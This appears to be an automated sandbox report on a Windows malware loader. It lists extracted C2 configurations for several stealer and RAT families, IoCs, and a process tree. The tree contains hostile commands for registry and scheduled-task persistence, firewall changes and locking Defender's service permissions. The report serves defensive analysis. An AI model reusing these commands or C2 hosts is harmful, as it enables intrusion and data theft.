Analysis

  • max time kernel
    205s
  • max time network
    337s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-01-2024 00:36

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

remcos

Botnet

Go!!!

C2

dangerous.hopto.org:2404

dangerous.hopto.org:2602

91.92.242.184:2602

91.92.242.184:2404

Attributes
  • audio_folder

    ??????????? ??????

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    taskhost.exe

  • copy_folder

    System32

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    true

  • install_path

    %AppData%

  • keylog_crypt

    true

  • keylog_file

    tapiui.dat

  • keylog_flag

    false

  • keylog_folder

    System32

  • mouse_option

    false

  • mutex

    ???-LDKG91

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    ?????????

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

redline

Botnet

@Pixelscloud

C2

94.156.66.203:13781

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Extracted

Family

xworm

C2

209.145.51.44:7000

Mutex

iLWUbOJf8Atlquud

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

lumma

C2

https://braidfadefriendklypk.site/api

Signatures

  • DcRat 26 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Xworm Payload 1 IoCs
  • Detect ZGRat V1 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • XMRig Miner payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file execution options in registry 2 TTPs 15 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 55 IoCs
  • Loads dropped DLL 46 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Modifies powershell logging option 1 TTPs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 53 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 23 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 6 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\clip.exe
        "C:\Windows\SysWOW64\clip.exe"
        3⤵
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
          "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
          4⤵
          • Executes dropped EXE
          PID:3760
    • C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4492
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:4092
      • C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\system32\mode.com
            mode 65,10
            4⤵
              PID:3692
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e file.zip -p1979614625696244291525413362 -oextracted
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:5104
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_1.zip -oextracted
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4696
            • C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
              "winhostDhcp.exe"
              4⤵
              • DcRat
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2984
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LI7DzOA1mG.bat"
                5⤵
                  PID:2516
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    6⤵
                      PID:4856
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      6⤵
                        PID:5012
                      • C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
                        "C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: GetForegroundWindowSpam
                        PID:3444
                  • C:\Windows\system32\attrib.exe
                    attrib +H "winhostDhcp.exe"
                    4⤵
                    • Views/modifies file attributes
                    PID:3692
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_2.zip -oextracted
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2088
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_3.zip -oextracted
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4416
              • C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                PID:2348
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  3⤵
                    PID:5020
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_technical_school\Tests_for_preparation_for_technical_school.exe"' -PropertyType 'String'
                    3⤵
                    • Adds Run key to start application
                    PID:2684
                • C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"
                  2⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:440
                  • C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
                    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2576
                    • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:5076
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                        5⤵
                          PID:3772
                      • C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp
                        C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp
                        4⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:852
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp" & del "C:\ProgramData\*.dll"" & exit
                          5⤵
                            PID:1940
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 5
                              6⤵
                              • Delays execution with timeout.exe
                              PID:4636
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 2188
                            5⤵
                            • Program crash
                            PID:680
                      • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
                        "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:5024
                      • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:1360
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 372
                          4⤵
                          • Program crash
                          PID:4996
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 388
                          4⤵
                          • Program crash
                          PID:1200
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 392
                          4⤵
                          • Program crash
                          PID:1436
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
                          4⤵
                          • Program crash
                          PID:2528
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
                          4⤵
                          • Program crash
                          PID:3300
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 740
                          4⤵
                          • Program crash
                          PID:4420
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 760
                          4⤵
                          • Program crash
                          PID:3220
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 760
                          4⤵
                          • Program crash
                          PID:3640
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 720
                          4⤵
                          • Program crash
                          PID:2292
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 788
                          4⤵
                          • Program crash
                          PID:2528
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 784
                          4⤵
                          • Program crash
                          PID:2584
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
                          4⤵
                          • Program crash
                          PID:3216
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 812
                          4⤵
                          • Program crash
                          PID:3324
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 672
                          4⤵
                          • Program crash
                          PID:4552
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 780
                          4⤵
                          • Program crash
                          PID:1900
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 796
                          4⤵
                          • Program crash
                          PID:2700
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 624
                          4⤵
                          • Program crash
                          PID:2296
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 808
                          4⤵
                          • Program crash
                          PID:1992
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 888
                          4⤵
                          • Program crash
                          PID:1648
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          4⤵
                          • Blocklisted process makes network request
                          PID:3616
                        • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                          "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                          4⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Checks for VirtualBox DLLs, possible anti-VM trick
                          • Drops file in Windows directory
                          • Modifies data under HKEY_USERS
                          PID:1336
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 344
                            5⤵
                            • Program crash
                            PID:3700
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 360
                            5⤵
                            • Program crash
                            PID:3608
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 228
                            5⤵
                            • Program crash
                            PID:3156
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 644
                            5⤵
                            • Program crash
                            PID:1844
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
                            5⤵
                            • Program crash
                            PID:4412
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
                            5⤵
                            • Program crash
                            PID:3336
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
                            5⤵
                            • Program crash
                            PID:1588
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 720
                            5⤵
                            • Program crash
                            PID:1800
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 744
                            5⤵
                            • Program crash
                            PID:772
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                              PID:4288
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                              5⤵
                                PID:2392
                                • C:\Windows\system32\netsh.exe
                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                  6⤵
                                  • Modifies Windows Firewall
                                  PID:5012
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:2744
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:3668
                              • C:\Windows\rss\csrss.exe
                                C:\Windows\rss\csrss.exe
                                5⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Manipulates WinMonFS driver.
                                • Drops file in Windows directory
                                PID:2080
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 264
                                  6⤵
                                  • Program crash
                                  PID:1780
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 388
                                  6⤵
                                  • Program crash
                                  PID:2076
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 392
                                  6⤵
                                  • Program crash
                                  PID:1708
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 680
                                  6⤵
                                  • Program crash
                                  PID:4924
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 720
                                  6⤵
                                  • Program crash
                                  PID:4036
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 732
                                  6⤵
                                  • Program crash
                                  PID:464
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 748
                                  6⤵
                                  • Program crash
                                  PID:3156
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 764
                                  6⤵
                                  • Program crash
                                  PID:2584
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 784
                                  6⤵
                                  • Program crash
                                  PID:2928
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  PID:1860
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 876
                                  6⤵
                                  • Program crash
                                  PID:4536
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                  6⤵
                                  • DcRat
                                  • Creates scheduled task(s)
                                  PID:4796
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /delete /tn ScheduledUpdate /f
                                  6⤵
                                    PID:2292
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                      PID:4216
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 928
                                      6⤵
                                      • Program crash
                                      PID:2212
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      PID:1268
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        7⤵
                                          PID:2984
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 856
                                        6⤵
                                        • Program crash
                                        PID:1844
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 956
                                        6⤵
                                        • Program crash
                                        PID:1092
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3216
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        6⤵
                                        • DcRat
                                        • Creates scheduled task(s)
                                        PID:1384
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 916
                                        6⤵
                                        • Program crash
                                        PID:3364
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1032
                                        6⤵
                                        • Drops file in System32 directory
                                        • Program crash
                                        • Modifies data under HKEY_USERS
                                        PID:4216
                                      • C:\Windows\windefender.exe
                                        "C:\Windows\windefender.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:1328
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                          7⤵
                                            PID:2396
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                              8⤵
                                              • Launches sc.exe
                                              PID:4336
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1120
                                          6⤵
                                          • Program crash
                                          PID:2076
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1136
                                          6⤵
                                          • Program crash
                                          PID:4580
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1048
                                          6⤵
                                          • Program crash
                                          PID:4356
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1068
                                          6⤵
                                          • Program crash
                                          PID:116
                                  • C:\Users\Admin\AppData\Local\Temp\rty25.exe
                                    "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5064
                                • C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4444
                                • C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:780
                                  • C:\Windows\System32\werfault.exe
                                    \??\C:\Windows\System32\werfault.exe
                                    3⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3748
                                • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
                                  2⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3980
                                • C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
                                  C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4464
                                • C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2332
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    3⤵
                                      PID:608
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      3⤵
                                        PID:4392
                                    • C:\Users\Admin\AppData\Local\Temp\Files\south.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\south.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1752
                                    • C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3064
                                    • C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      PID:1436
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe" /rl HIGHEST /f
                                        3⤵
                                        • DcRat
                                        • Creates scheduled task(s)
                                        PID:3028
                                      • C:\Windows\SysWOW64\SubDir\asg.exe
                                        "C:\Windows\SysWOW64\SubDir\asg.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2072
                                        • C:\Windows\SYSTEM32\schtasks.exe
